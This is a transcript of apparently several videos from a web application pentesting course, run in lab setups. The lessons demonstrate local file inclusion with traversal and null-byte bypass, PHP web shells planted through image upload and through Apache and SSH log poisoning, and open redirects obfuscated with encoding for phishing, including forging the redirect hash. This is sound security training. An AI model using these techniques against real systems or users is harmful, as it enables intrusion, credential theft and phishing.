anybody else, and hence we can't read it here. But you would actually find vulnerable configs where you might be able to read this file. etc password gives you a list of possible usernames on the system, which is a good place to start with. Now, however, here are other interesting things you can do. You can actually try to read htaccess files, right, if there are any in that directory. Or you can try and go one directory above, and if you notice in this case we actually found an htaccess file. It basically points us to the auth user file, fantastic, which seems to be under the basics directory itself. This is good. So you can actually go in and look at this file as well. This is really in the same directory, and we get a possible username and a hashed password, which we've looked at previously as to how one can go ahead and break this. Now keep in mind that a lot of times, for example, the htaccess file could actually have open and close tags, and you might not be able to view everything in here. So always remember to go ahead and view the source of the page as well. So if you notice in this case, we actually have a file called credit card, which is the only one being protected inside the basics directory. So if now we try to access credit card, you would notice that we get the authentication alert in here. And the best part really is you can actually read credit card directly using the LFI, which we have here right now. And here are the contents of the file. Fantastic, right? So this is how LFI can come in handy in actually looking at files, looking at different policies on htaccess and other restricted files. Pretty much you can look at most files which are under the web server, and that makes it a very powerful attack, right? You can have config files in there with probably usernames and passwords for the database, and a ton of other things. Now in the coming videos we'll look at different variations and other interesting stuff which we can do with LFI. So that's all I had in mind for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Web Application Pentesting course on Pentester Academy. Now in this video, we will look at exploiting LFI when there are directory prepends happening in the include. So here is the vulnerable code, and if you notice, what we've done is we've prepended an HTML slash with whatever comes in for page. And of course, from the developer's perspective, this is exactly how it would be, because the HTML directory is what contains the different pages, right? So to show a quick demo, and you can download these files as a zip from under the video. Say home.html, and if you clearly see, it says I am home, and this is the local file which was actually fetched, right? Home, and similarly this is contact. Fantastic. There you go. Now in such cases we can actually do a path traversal attack. So let's say we have no clue about where etc password is, so we can try going down one level. Doesn't seem to work. Let's add another level. Doesn't seem to work. Let's go down another level. Again doesn't work. One more level, and there you go, right? So like this, depending on where we are, because not necessarily every single time you would be mapped to var www, we can actually do a path traversal attack. Now similarly, we can actually even find security controls. Nothing in here. Aha, right, just like in the last video. And if you recall, I said whenever you look at any of these config files with a browser, also ensure you look at the source, because a lot of times they have open and close tags which end up getting not shown by the browser, right? So if you notice, there is a file called credit card in the directory which is password protected, right? So we could actually try and access the file, and there you go, right? Now in the previous directory, if you had seen the htaccess file, you would also find ht password in there. There you go, and this can come in handy. Maybe there are users by the same name, you can do a bunch of things. So this is how one goes ahead and beats the cases where directories are actually prepended to the vulnerable part of the code in LFI. So that's all I had for this video, and if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Web Application Pentesting course at Pentester Academy. Now this will be a very interesting demonstration of how an LFI combined with a file upload can actually lead to remote code execution. So how would this work? Now let's assume that things like double extensions have been disabled on Apache, right?
Now this would definitely mean that your conventional file upload vulnerability by uploading an image file which is named as, let's say, abc.php.gif will definitely not execute. But what if one could upload such an image file with embedded PHP code and then call that file using an LFI vulnerability? This would lead to remote code execution. So let's look at a live demonstration of how this is done. So here is my website and I have a file upload application. Now, for example, let's say this is an online forum in which you can upload your avatars and signatures and other images. So one could go ahead and upload an image file with embedded PHP code in it, which would even go ahead and beat checks such as get image size, as we've seen in previous videos. So let me actually go ahead and create a PHP based backdoor. So I already have a GIF file called action_back.gif. Let me copy my usual simple web shell to the current directory. And just like what we've done in previous videos, and if you don't remember, please go back and have a look. We are going to go ahead and add the simple backdoor PHP web shell into action_back.gif in the comment metadata and get back action_back_out.gif. There we go. And as I mentioned earlier, if you actually do a strings on action_back_out.gif, you would actually find our backdoor safely inside of it. Now let me go ahead and upload this backdoor. So you go in here, action_back_out.gif, click upload, and if you notice, the file has been uploaded, right? And this would be inside the uploads directory. And if we click on this, if you notice, the GIF image is displayed perfectly and the PHP script is not executed, right? Simply because, of course, even if you had double extensions put for this, you'd actually find that by default on Apache now, double extensions are disabled. So this is just like any other ordinary GIF file. Now, if on the same application you have an LFI vulnerability. So here is the LFI application, takes in page as input, you can put in home, and there you go, right? Now, if we go back in here and look at the vulnerable LFI code, you'll actually find that it's taking files which we placed inside the HTML directory, which is really what it is showing here as well. So in such a case, let's say if you wanted to include action_back_out.gif, you would have to go ahead and do a bit of directory traversal. So one level down in this case, paste this, hit that, right? And if you actually notice, through our GIF, the PHP has been executed, and this basically tells us that this is the usage for the current file, right? So what one could end up doing is they could copy this out and pass this as an additional parameter to lfi.php, and there you go. Now we have etc password executed, and now pretty much you have a web shell access on the remote server, right? Fantastic. So as one can see, this is how you could combine an LFI with a file upload vulnerability and get remote code execution of your choice. So I've gone ahead and zipped up this entire directory with all the files in there. Just remember to give the uploads directory right permission, right? So you can go ahead and upload files into it and try this example out. So hope you've enjoyed this video, and if you're having fun at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the web application pen testing course at Pentester Academy. Now in this video, we will look at LFI, where file extension has actually been forcefully appended as well. And we'll see how we can use a null byte injection to go ahead and overcome this situation. Now, the victim machine on which our PHP script is going to run in this case is Metasploitable 2, which you can download from the link provided. And here is the vulnerable code in which now you notice we have HTML/prepended, and this is the directory, and .html is appended to ensure that this is the file name we are going to pick up. So let's actually get down here. Now I've already logged into the Metasploitable instance, and I've created a folder called demos under var www, and inside demo there is another folder called lfi_prepend append. Now this is directly from the zip file which is available for download below the video, and the IP address of my Metasploitable machine is 1.40, 192.168.140, and you can go ahead and give an IP address depending on what is comfortable to you, and I am accessing it from the attacker machine using a browser. So let me click in here. Now this script works by passing in a parameter page, and in which you can mention home, right? And if you notice, it says I am home, or alternately you can actually put in contact, in which case it says I am contact, right? These are the only two options which are available. And if we look closely, there is a directory called HTML. If we go inside it, we see contact.html and home.html both, and that very well explains how this code works, right? Now, how do we go ahead and bypass such a extension jail, right? So here is what we can do. If we go ahead and append a %00, this would end up terminating the string and go ahead, and we would end up actually picking up contact rather than contact.html from the HTML directory. This is because this string is passed to the C libraries which work for PHP, and they in turn unfortunately use a null or a basically 0x00 byte as a string terminator. So if you go ahead, hit this, you'd actually notice that it actually says that it is unable to find the file HTML/contact, right? So now here is what we can do. We can go down one directory, and let's assume that is the lowermost directory or the root directory, and let's try and print etc password. Of course, we'd have to append the null at the very end. If you notice, that failed. Let's now go down one more directory. Again, that failed. Let's go down one more directory. Again, that seems to have failed. Let's go down one more directory. And as we can clearly see, this isn't working yet.
Let's actually go down another directory. And there you go. Finally, we have success, right? So using null injection, we are now able to traverse different paths, and depending on what permissions we have, we can access different resources on the remote machine, right? So this is how, in the case of LFI, when you have a directory prepend and a file type getting appended, one can still use a null byte injection to go ahead and access other files on the system. So hopefully you enjoyed this video, and I'd highly recommend that you download the code and try this out. And if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. All, welcome to the Web Application Pentesting course at Pentester Academy. Now, in this video, we will look at remote code execution using a combination of an LFI vulnerability along with log poisoning. So, what is it that we are really going to do here? Now, a lot of network services like your web server, SSH server, certain FTP servers and whatnot use log files. Now, if an attacker can somehow manage to inject code into these log files, and if these log files are readable by your Apache server, then it could be possible that if an LFI vulnerability exists, then we could have an RCE. Now for this lab, I'll be using Metasploitable 2, which you can download from here. And the vulnerable code remains the basic lfi.zip file, which you can also download from below this video. So let's get started. Now here is my Metasploitable 2, which is already running. Now this has an IP address 1.40, and here is my attacker machine with an IP address 1.10. Now let me log into Metasploitable to look at certain configs. So I'm going to do an SSH MSF admin. The Metasploitable is on IP address 1.40. The default password for Metasploitable 2 is MSF admin as well. There we go. Now let's go to the log directory, change directory /var/log. Now if you notice, there are tons of logs depending on which services are running. We can clearly see Apache, which is actually a directory. We can see auth.log, which typically is created by SSH, which we'll look at in the next video. Now for this video, let's just focus on Apache 2 directory. Now looks like this directory is currently not readable by everyone, right? And for this demonstration, we would actually have to have the directly readable. Now keep in mind that in most cases, web admins end up creating custom directories where these log files are stored, and in many cases they forget to set the permissions properly. Now there is a very good Q&A session at security.stackexchange about this, which I'd recommend you read. Now for this demo to work, the assumption is that the log directory is actually readable. So let me go ahead and make it readable. I'm going to do a chmod, or rather first let me become the root user. I'm going to do a chmod 755 and recursively run it on the Apache directory. Now before I do that, let me actually show you the vulnerable code in there as well. So I'm going to connect again, MSF admin 192.168.1.40. Let me also open up a web browser and let's browse our page. Now, if you recall, this is really the default lfis.zip app. We can verify that. Let's go into var www. Now, I have installed lfi.zip in a directory called lfi. So let's go inside that. And you can clearly see all the files in here, right? You can see lfi.php. So all I'm doing right now is going ahead and running that. Now, as you know from previous videos, lfi.php is vulnerable to a local file inclusion attack. Now, let's go ahead and try to, let's say, include /var log apache access.log. Now, if you actually notice, by default, it looks like permission seems to be denied and we aren't able to open this file, right? Let's go back in here. Let's change the permission set. And now let's try. Let's go back in here. And if you notice, now we are able to include this log file using our LFI. And we can clearly see the Apache style logs in here. Now, to make matters interesting, let's open up a new terminal. Or rather, we could just use this terminal and do a tail on the access.log file. Here we go. Now, where are we at? Now, at this point, we have discovered that lfi.php is vulnerable to LFI, and looks like one of the log files which Apache creates, access.log, is vulnerable to being read by the web process or Apache. Now, what we want to do is go ahead and inject PHP into this log file. Now, there are various places where you can do this, but clearly the user agent seems to be a comfortable place. So let me go ahead and do this many ways. I'm just going to use burp because it's the most standard way to do it. You could even change user agent by changing the about.config preferences. That's a possibility. You could use wget as well using the user agent option. As I said, many possibilities. The one I'm going to use is using burp, just so that we have a standard tool being used. So there you go, burp is up and running. Go to proxy. Proxy seems to be running. Intercepts are on. So let's go back in here. And let me actually just try and get my home.html. And in this, I'm going to inject PHP code as part of the user agent field. So I'm going to put in PHP code. Now, all this has to do is be a very simple web shell. So we can just do an echo system and let's go ahead and feed in a command line parameter cmd through which we're going to feed in the command, and let's exit the program after that. Right, so ecosystem $_get command, this runs first. This basically takes in the command parameter as an input from the URL, executes it, echoes it back, which means we get it as an output in here, and then the script gracefully exits. So let me forward this and let me disable intercepts. And if I go back in here, you notice that this injection has now happened in here. Right, we can clearly see the injection has happened. Fantastic. So now when I'm going to go back in here and try and access var lag apache access.log, you'll actually find that we were able to access it, but it says cannot execute a blank command. Probably see that in here. That's simply because we haven't passed in the command line argument yet. So let's do that. Command equals, let's say, ls, and there you go. We can see the output of ls in here. Let's do a standard psax, so you can find all of that. Let's do a pwd. Here you can clearly see the output of pwd. Let's do a cat etc password. Oops. And there you go, we have the output of cat etc password. Right? Fantastic. So this is really how you can go ahead and do log poisoning when the log file is readable by Apache, and once that is there and an LFI exists, you can do a remote code execution attack on the system and gain a shell there. So hope you enjoyed this video, and if you're having fun at Pentester Academy, please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the web application pen testing course at Pentester Academy. Now in the last video, we saw remote code execution using LFI and Apache log poisoning. In this video, we'll look at RCE with LFI and do SSH log poisoning. Now the victim machine setup remains the same. We use Metasploitable 2, and the vulnerable code is there in lfi.zip, which we've used previously, but is additionally available for download below this video. Okay, so what is the logic that we will be applying here? Now, SSH logs are sent to auth.log, and if that is readable, then we can abuse the username field, which is actually logged in the file, to do log poisoning. Now, the logic of course remains the same as in the previous video. The username field would contain our PHP web shell, which we would then execute using the LFI vulnerability. The original source for this attack, from what I could find online, is Landmaster's website. Please have a look. That's the blog post. And pretty much this video is a replay of what attack is mentioned in that post. So let's go ahead and do the actual attack. So this is my attacker machine, and this is my victim machine running Metasploitable 2. Let me log into my victim machine, which is at an IP address 1.40. Let's give it a bit. The default password is msfadmin, and if we look at var log auth.log, you'd actually find that it is pretty much readable by all. Now let's go ahead and tail on this log. There we go. Actually, let's go ahead and remove any existing traces. Now lfi.zip was unzipped just like the last video, and this is the base application. And now this lfi.php is vulnerable to an LFI vulnerability. So now let's go back in here and let's actually do a quick demo. So let's say I put in even a non-existing username, let's say and try to do an SSH. what we would actually find is that this is logged in auth.log. There you go. If you notice, it says invalid user, right? And this is pasted in as is. Of course, wouldn't make any sense right now to enter password, but we can clearly see that we've logged this twice in the log file. So all we are going to do right now is, rather than sending out root toot, we will send in our PHP web shell. So let's do that. SSH. Then let's put in our PHP script, exactly the one which we used in the last video. System cmd, which will take the command as input, and let's go ahead and exit after this. Of course, keep in mind, even though we are putting this in twice, the execution will only happen for the first one because we'll be exiting here. And at the very same time, we have to get this right the very first time itself because of the exit. Because anything we log after that will not be executed till the time the logs don't get rotated. There we go. So let me triple check that. PHP ecosystem command, and then we have exit. Okay, looks good to me. And before we do that, let's first check if var log auth.log is readable. It is. If you notice, you've read it using the LFI. Now I can go back in here, hit this. Let's wait for it. Awesome. Here we go. You have it in here. Now I can go back in here, hit an enter, and of course it says cannot execute a blank command. That's absolutely fine, my friend. I'll give you a nice little command to execute. And there we go, right? We have etc password, and as you can well imagine, from that point we could pretty much do anything. Right, you could run a wget, get a PHP meterpreter, and actually get meterpreter on the box. Awesome. So hopefully you enjoyed this video. As I mentioned, the credit for this attack goes to Landmaster. I think it's a very fantastic way of proving that you can even poison other logs apart from the regular Apache. And I would really say, when you scan with Nmap, check for which services are existing on the box and see if you can try and access any of their log files using the LFI. And if yes, then see if the log poisoning is possible. So I've already mentioned this to you guys, the log poisoning part. Fantastic. And if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the web application pentesting series at Pentester Academy. Now in this video, we will start with another very common web-based vulnerability called unvalidated redirects. So what are unvalidated redirects? Now in a web application, at many times the app might need to redirect you to, let's say, a login page, right, on the same website. An example could be when you're trying to go ahead and access a part of the application which requires authentication, and you have probably bookmarked one of those pages which requires auth, but you've been logged out. You click on it, the app redirects you back to the login page. This would be an example of internal redirection. Now, there are cases where you might need to be redirected even to external websites. So here is an example
let's say the website uses OpenAuth or something like that to use Twitter, Facebook, Google, any of that to authenticate you. Or maybe you're a social media website where users are posting external links on your pages, such as forums, etc. And then the user clicks on that link and he needs to be taken to the external website. However, because you want to figure out which external links are being clicked and at what frequency, you want to redirect them rather than allow them to go there directly so that you can log all of that info. So redirection has pretty much been around and is as old as the www. Unfortunately, it is very easy for phishers and spammers to go ahead and abuse open redirects. Now, what do I mean by that? Well, let's say there is a phishing attack in which the phisher goes ahead and creates a redirect URL using your website to point to his. And then he sends this link over an email, maybe over social media, to an end user. And because the initial domain through which the redirect happens is yours, the end user thinks he's probably on your domain. So this creates a sense of trust which the attacker, phisher, spammer exploit. So let me jump right in and give you an example. Now I am on a Kali machine, and please download the PHP scripts available as a zip file below this video. So the first thing, of course, is to bring up the Apache server. You can do this using Apache 2CTL, and you can do a start if the server isn't started by default. Now, in this example, we are going to use the local machine. This does not contain any domain name or anything like that. This isn't even an addressable IP on the public internet, right? But in the real world, of course, this would be a site like facebook.com, securitytube.net, or something else. So let's go to the web directory where the PHP scripts would be put in. Now I've already unzipped and put index.php and redirect.php in there. So this is something you would need to do. Now let's look at index.php. Okay. So all index.php does is it has this small snippet of PHP in here. The rest of it is HTML. And it says, please visit this site, which is securitytube.net. So if I open a browser, I go to localhost, and then I go to index.php. I can see this. Let me increase the font size a bit. So this says, please visit securitytube.net for fantastic InfoSec videos, and we see a link, right? So if I click this link, we get redirected to securitytube.net, right? Everything looks perfect, right? And for most users, this experience is completely transparent, right? However, if I hover over the URL, I actually see that rather than the URL pointing to securitytube.net, it continues to point at a URL called redirect.php on the same domain, and that URL seems to be taking in a parameter again called URL as input, which contains the link securitytube.net. So let's open redirect.php. Now all redirect.php does is it sets a special header field called location, and if you look at the interpretation of the location field, whichever URL you set, the browser, once it receives this response, will go ahead and redirect to that URL, or very simply put, go to that URL. And that URL seems to be coming in directly from the user input parameter. In this case, we are assuming that this is through a link click, but the redirect script has no way of knowing or checking this. All it checks for is a URL parameter, and that's about it. So if I were to copy this link and paste it here, right, we can clearly see there is a parameter called URL, which is what is received by the script, and it plugs it in directly, right? There are absolutely no checks or no tests for anything. Now, as you can clearly see, it should be trivial to change this from securitytube.net to, let's say, google.com. And there you go. We have now arrived on Google's website. Now, why is this worrisome? Well, because an attacker can actually take this URL, and let's assume this was hosted on some site, mydomain.com, and he can take this URL, send it out over social media, over email, and a victim, when he looks at the URL, would probably feel this is from mydomain.com, which could be, PayPal, Yahoo, or any domain which allows for these redirects. And really, when the request is received from the victim by mydomain.com, all it is going to do is redirect to this website. Now, on this site, a phisher or a spammer might actually set up a lookalike site of mydomain.com and then try and siphon out authentication credentials like username, passwords, etc. Open redirects such as this one, where there is no authentication of any kind on the URL, is probably a suicide, I would say a suicide statement for banks, financial institutions, or websites which maintain any critical info for the user. Okay. So I hope it is clear why such an open redirect is so bad. Now, the issue is so widespread that this is part of the OWASP top 10, which is really a community curated top 10 most common mistakes which web applications have in them, which attackers exploit, right? Now, you can go through the link which I have provided. If you actually look at it, it basically says that, the exploitability is average, right? The detectability is easy in most cases, right? Now, keep in mind the detectability is easy if the web application developer knows what he's doing. But from an end user perspective, by using URL obfuscation and all of that, which we will look at shortly, it can be very, very difficult for an end user to detect it, right? Especially a non-technical one. Now, the impact is moderate. So it says such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information, right? Now, basically, imagine a website where, let's say, Microsoft.com has one of these open redirect vulnerabilities, right? An attacker sends a link to Microsoft with the redirect to his website, which looks exactly like Microsoft.com. However, the moment the user lands there, the attacker goes ahead and tells him to install a specific hotfix or a patch, right? Now, given the original URL was from Microsoft, and the attacker doesn't even need to have a domain name, he could just have an IP address to which the redirect happens, which would make it almost impossible for the user to even guess where he is, right? He's probably thinking this is one of Microsoft's patch servers.
which basically is on an IP address, right? And this could trick the user to install a piece of malware. Now, as far as the phishing attack goes, where the attacker can create a lookalike site, sensitive information may be disclosed. Now, this is the case where we are talking about external redirects. As far as internal ones, which are more popularly called forwards, a poorly architected web application might lead to authentication and authorization bypass, right? We will look at this example a little later. So that's all I have in mind for this video. If you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you and have a great day ahead. Bye-bye. Hello all. Welcome to the web application pen testing series at Pentester Academy. Now in this video, we will look at obfuscating certain parts of the redirect, specifically the params responsible for the redirect. Now, why is this obfuscation in the form of encoding, which is what we will look at, important? Well, a lot of times while doing the pen test, let's say you want to prove that if this URL was sent to a lot of people, some of them would end up clicking on it, then you want that part to be made as difficult as possible by the end user to detect on his own, right? You don't want securitytube.net or pentester.com or whatever you set up to be easily visible as part of the URL, because some users might just glance at the URL for a second and figure out it's something fishy, right? Now this is where in this video we will look at URL encoding, hex encoding, and successive encoding and see how it can completely obfuscate the look and feel of the URL. So let's jump right in. Okay. So you should have both of these PHP files as part of the download, right? The first index.php is pretty much just a simple PHP file which has a link to the redirect URL. Now the second one basically puts out a header parameter after applying a URL decode on the URL parameter. That's it, right? URL decode being used is very, very common in PHP applications. So let me go in here. Okay, so this is our URL. If you click on it, it forwards. Let's copy this URL. And we can clearly see that this is the parameter which we would want to change, just like what we saw in the previous videos. Now, let's actually open up an editor to work with this. I'm going to use LeafPad. I'm going to paste this in here, remove this part, so I just have the URL with the parameter I want to keep changing, which is URL again. And let's actually paste this out a couple of times so that we can create these URLs in here, right? Okay, so the first thing I'm going to do is apply a basic URL encoding. And if you just Google for URL encoder, decoder, this probably is the first site. It's what we use. I'm going to say http securitytube.net. I can go down, hit an encode. Copy this out. Paste it in here. Copy it out. Go back here. Paste it. Hit an enter. and there we go, perfect, right? So now the slash slash is something which in a way was obfuscated, so that when a viewer visually sees it, he doesn't feel that there is a URL as part of the URL, at least at first glance, right? Great. Now, what I want to do is, you may have this question, right? When we paste it here, is the browser sending the request as is, which is with the percentage 3A's and all of that? Or is it just changing it to a slash slash and sending it, right? We don't know. It isn't very important from our perspective most of the times, simply because the URL redirects and forwards are used to fool the end user rather than the remote server in any way. Given that the developer may have applied this application logic already. So here's what I'm going to do. Let's open up Wireshark. Let's launch Wireshark. Let me actually go full screen. And let me start sniffing on the loopback interface, right, which is where the server is running. And let's go back in here, paste it, hit and enter. There we go. And we can clearly see the traffic being generated. Here it is, right? So if you actually notice, we are sending this URL encoded part as is, right? Here is the server's response where it says not found but adds a redirect, and we can clearly see that the redirect is done to securitystube.net, right? And clearly, this means the server was able to decode it perfectly and send it back to us. Fantastic. Now let's look at this further. So now what if we want to go ahead and use full hex encoding, right? For this, I'm going to use RSnake's website, the XSS calculator. This is interesting because we can use the XSS calculator for full hex encoding. So I'm going to put this in. Just verify the URL is correct. Hit encode. Copy this out. Go back to LeafPad and paste it here. There we go. Now we can actually see that rather than just this part, right, which is clearly locatable in here, everything is hex encoded. And clearly this is something which the user almost will never be able to recognize visually. Now let's verify what gets sent. Start the sniffing. Let's go back in here, paste it, hit and enter. The redirect works perfectly. And if we go back in here, you can clearly see that this is what was sent to the server as is, and the server decoded it perfectly and sent us back to securitystube.net as expected. Fantastic. Now, one of the things, of course, is you could have taken this as well. On here, pasted this, copied it, go back to LeafPad. This one, of course, would be longer. Clearly see that. Copy this, paste this one,
And there you go, right? I don't remember if I had enabled this, but if we had, okay, here is the second one. Here we see it, right? Fantastic. So as you can clearly see that now if this link is sent in an email, especially the one where you can go ahead and send out an HTML email, then this would be very, very easy to obfuscate, because when the user hovers his mouse over it, and of course in this case we have very predictably named this as redirect.php, but most end websites may just have an action/do with a list of parameters in a very cryptic way, right? Such as r is equals or rms equals, which almost makes it impossible for the end user to figure out if this is some data, state data, or is this even a URL? It's almost impossible to figure it out. Okay, so let's do another interesting variation, with hex. So go back here, put this in, we've encoded it. So now this URL is completely full hex encoded once. I'm going to copy this out, paste it, and then click encode. So now the encoded form has been re-encoded. There you go. You can see now the size has considerably increased, which is of course expected. I'm going to copy this one out. Let's go back in here, paste it. And there you go. Again, this works perfectly. Now I could take this double encoded one, put it back again, encode it again, copy it out. Keep in mind there is a limit to the length of the URL, which we definitely can't exceed, or else this might just get truncated and not work, right? Which might be the case now. Right. If you notice more than double encoding, it doesn't seem to move ahead with this anymore. Can you see that? Anyway, so this is really how you can apply multiple encodings to go ahead and successive encodings just with hex to make this completely obfuscated, right? Completely obfuscated. And this really is probably the easiest way by which you can go ahead and send out a phishing or a spamming email to show to the enterprise and to the web developer how easy it might be to go ahead and trick end users into thinking that still they are working in the realm of the existing website. Okay, so that's all I had in mind for this video. And if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pentesting class at Pentester Academy. Now in this video, we will take up a variation of how unvalidated redirects, or open redirects as they're popularly called, are implemented by developers. Now, one of the most common implementations is using base 64 encoding. So the developer would take the original URL to where you would like to be redirected, and really that URL is base 64 encoded and hence looks quite obfuscated when you view it for the first time. Now this is where base 64 encoding decoding is so popular on the web that anytime you see any data, you should try and do a base 64 decode and see if that yields anything. So let's jump right in. Now, in this case, keep in mind that URL encoding and base64 encoding as well as decoding will work hand in hand. And this is where, rather than giving you the code snippet, I'd like to modify the simple example which we had taken in the last video and apply URL encoding and base64 encoding as well as decoding to it, so you get a flavor for how they work. Okay, so I'm going to create a new directory called base64, and I'm going to copy all the files from the last video inside of it. Here we go. Let's open up index.php. Now, what I want to do right now is this data http securitytube.net, which is part of the URL parameter. I wanted base64 encoded, followed by URL encoding. So let's go ahead and write out the PHP code for it. It's actually quite simple to implement. And to be very honest, it's always a good idea to slowly start looking at how this is implemented in code. And this can only make you a better pen tester. Okay, so I'm going to use a new variable. Let's call it encoded URL. And the first step, of course, is to base64 encode this URL. And then, of course, is to URL encode it. Write the output of this. There we go. Now, let's change it in the appropriate place. So I'm just going to go ahead and substitute this with $encoded URL. Right. Now let's save this. And if we go to the base64 directory, we see the same link. If we hover about it, we can clearly see at the bottom the base64 encoded data. Right? If we do an open link in new tab, of course, this in no way is found anywhere. Right? The redirect, of course, wouldn't work at all. Now, let's write the redirection part of this, which is actually just as simple. Now, of course, first step would be to URL decode it, and then all we do is base64 underscore decode. That's it. Now, if you go back in here, refresh the page, and there we go. The redirect works perfectly. Now, this is the implementation, and as you can clearly see, to beat this is exceedingly easy as well. So if I were to look at this URL, let's copy this out to LeafPad. Right, you can clearly see that at the very end, let me hover my mouse here, the equal to has been replaced by the encoded value %3d. Right, so let's go in here, let's go to the decoder, and let's paste this. Okay, I'm going to remove this, just make it equal to. Let's go down here, click on decode. And there you go. We can clearly see HTTP securitytube.net is the decoded value, right? Now, if you wanted to go ahead and use some other value, all we would have to do is to encode some URL, http google.com. Let's encode this. You can go back in here and just to be safe, we can use URL encoding. So let's go back in here, paste this, encode it, go back. You can clearly see the percentage 3D was applied. Copy it out. Paste it in here. Let's open a new tab. Paste this. And there you go. Now the redirect goes to google.com. Fantastic. So as you can clearly see, base 64-bit encoding of course does manage to obfuscate how the URL looks like, because let's say to the naked untrained eye, this definitely looks like some data which probably may have been encrypted, or definitely something which does not look like a URL by any chances, right? And as I mentioned previously, if the developer obfuscates the name of the params as well as the name of the script, it might almost be impossible to look at what is in there. And this is where in many cases the first step is to take each of the params of a URL, and if any of them do not make any sense, then it might be a good idea to run them through common decoders like base 64, hex decoders and all of that, and see if any interesting data is yielded from them. Now keep in mind though, there are possibilities where developers, just to obfuscate things, might employ multiple encoding schemes in this way, right, in quick succession. So there could be a possibility where you may have hex encoding applied first, and the output of that could basically have a base 64 encoding, or vice versa, or even chaining multiple base 64 hex encoding and other encodings together, right? So this can actually get very tricky and interesting, but keep in mind that encoding itself is never a way to protect the data or to protect its integrity, right? And that's where I think a determined attacker, no matter how much a developer tries to play with changing the shape, form and look and feel of this encoded data, a determined attacker would always figure out what is basically behind it. Okay, so please download these files, preferably see if you can kind of type along with me. It's always a good idea to learn languages like PHP, because I think 60 to 70% applications which you would encounter would be written in this language, and it might not entirely be a bad idea to learn PHP. Okay, so that's all I had in mind for this video. And if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the web application pentesting series at Pentester Academy. Now in this video, we will continue to look at different techniques developers use to secure open redirects and how we can beat them. So in this specific material, we will look at when developers use a hash-based check. Now many a times an application creates the hash of the URL and then in the redirect URL, both the URL and the hash is present. This is done simply because then the application does not have to maintain a huge list of URLs and the corresponding hashes. Now, when an application receives a redirect request for a given URL and the supplied hash, then it goes ahead and checks it, and if the hash is valid for the URL, then it allows it through. Now, this may seem simple, but keep in mind that the sheer number of hashing algorithms out there makes it sometimes very, very difficult to figure out how the application is working. So let's take an example. Now, let me open up the browser. I'm going to go to localhost/hash. Now, I see a link. Please visit securitytube.net for fantastic videos. If I click on it, I arrive on securitytube.net. Let's go back. Let's copy this URL out. Let me open up LeafPad. Let's paste this. There you go. Now, if you look at it, we have basically got the URL, and along with that, we seem to have this value. Of course, just to keep it simple, I've already mentioned an appropriate parameter name called hash. Might not be the case. You might see something which looks like this, right? Pretty cryptic. And clearly, if you basically go ahead and change this URL, let's say google.com, and we copy this out, go back in here, paste this, and now if you notice, the application gives you a invalid redirect URL. So what is this hash? Now, as you can clearly figure out, well, just by looking at it, it is really going to be super difficult to figure this out. Now, this is where if you can identify the application framework, right? Is it PHP, .NET, or whatever? And then try and look at most of the included libraries for hashing functions available with the framework or the programming language, then this might be a better place to begin. So let's go back here. Copy this URL out again. Paste it. Now, as you can clearly imagine, this would actually mean first figuring out what are the different hashing algorithms which the framework might support. So I'm going to open up index.php. You guys should have these files in the zip file available below the video. Now, I have commented this section out. And what I'm going to do is basically go ahead and print all the hash algos available on most PHP based systems by default, right? So let's go back in here. I'm going to refresh this page, and I can see the different hashing algorithms available. So I can see we have MD2, MD4, MD5, all the different SHAs up to 512, and a bunch of others which are available, right? You even have CRC32, right? Some of which most of us may be more aware of, and some hashing algorithms which clearly we've never ever heard of. So in this case, one of the steps we would need to do is write code where we can feed in a URL, and then we can go ahead and see the hash of this URL based on all of these different hashing algorithms, right? And of course, if you research on the programming language, the default libraries, or even the application framework and their default libraries, mostly developers would stick to them rather than creating their own hashing functions, right? Now, in this specific case, as we can see, the developer has been using MD5, right? And creating a hash of the URL. In the next video, we will actually take up hashing with salt. Don't worry if you don't know what a crypto salt is. We'll discuss that in the next video, right? So as you can clearly see, to solve this problem, we need to write a simple program which can actually print out the hashes for different hashing algorithms given a URL. So this is what this little program does. For every hashing algorithm available using hash algos, we go ahead, create the hash and print it out there for a given URL which is taken as input. So I'm going to go back here, and all I have to do is basically go to localhost hash and then say hash.php, and this requests a URL. I'm going to just type in http securitytube.net, right? This is exactly the one we have here in this URL. If you hover your mouse, you can see at the bottom in here, securitytube.net. Now let me click on get hash list, get a bunch of them. Okay, here you go. So if I look at this specific one, go in here, we see it begins with 9529. Okay, should be an easy way to at least begin the search. And here we go, right? We can clearly see that MD5 seems to have it, right? This is the one here. Fantastic. So now if I were to change the URL to google.com, I get a series of MD5s. Let's copy this out and go back in here. Series of hashes of which this is the MD5 one. And let me change this to google.com. Copy this out, paste it, hit an enter, and there we go. Now the redirect works perfectly. Now keep in mind though that hashing algorithms are definitely case sensitive, right? And it will not work if you change the case, uppercase, lowercase, or of course if you definitely like add a www or whatever, right? So this is how you can begin looking at how you can try and figure out which hashing algorithm was probably used. It's a good idea to have scripts like this for multiple platforms and all the libraries they support, so that you can very quickly figure stuff out. Now let's actually play with a small variation. And what I'm going to do is, let me open up index.php and let's say I change this to SHA-512. Right, now if I go back in here, hit an enter, you'll actually find the link is just huge. Let's go back here, let's enable word wrap just so that we can see the whole link in its entirety and beauty. Unfortunately, even word wrap was not going to work for this, because let's see if we can do a complete wraparound. Doesn't look like we can. Okay, so you can clearly see the size of a SHA-512, right? Now if I were to go back here, use securitytube.net, hit this, here is my SHA-512. The value is 6FB61. That's how it begins. So we have 6FB61, as you can clearly see here, which points to us that this is SHA-512. So now if I wanted to get the same thing for google.com, I'm going to copy this out. Paste this new hash. Hopefully I should be able to copy this properly. Let's actually go back here just to verify we have this copied correctly. Okay, my mistake is I haven't changed this to google.com. Let's go back in here. Right. Of course, this isn't going to work simply because we have to change the hashing algorithm on both sides. Stupid me. Which is 